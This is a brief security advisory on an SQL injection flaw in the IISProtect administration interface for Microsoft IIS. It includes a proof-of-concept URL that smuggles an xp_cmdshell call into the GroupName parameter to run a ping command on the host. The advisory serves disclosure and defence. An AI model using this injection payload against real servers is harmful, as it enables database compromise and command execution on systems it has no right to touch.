source: https://www.securityfocus.com/bid/7675/info
The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.
Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences.
http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--
This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.
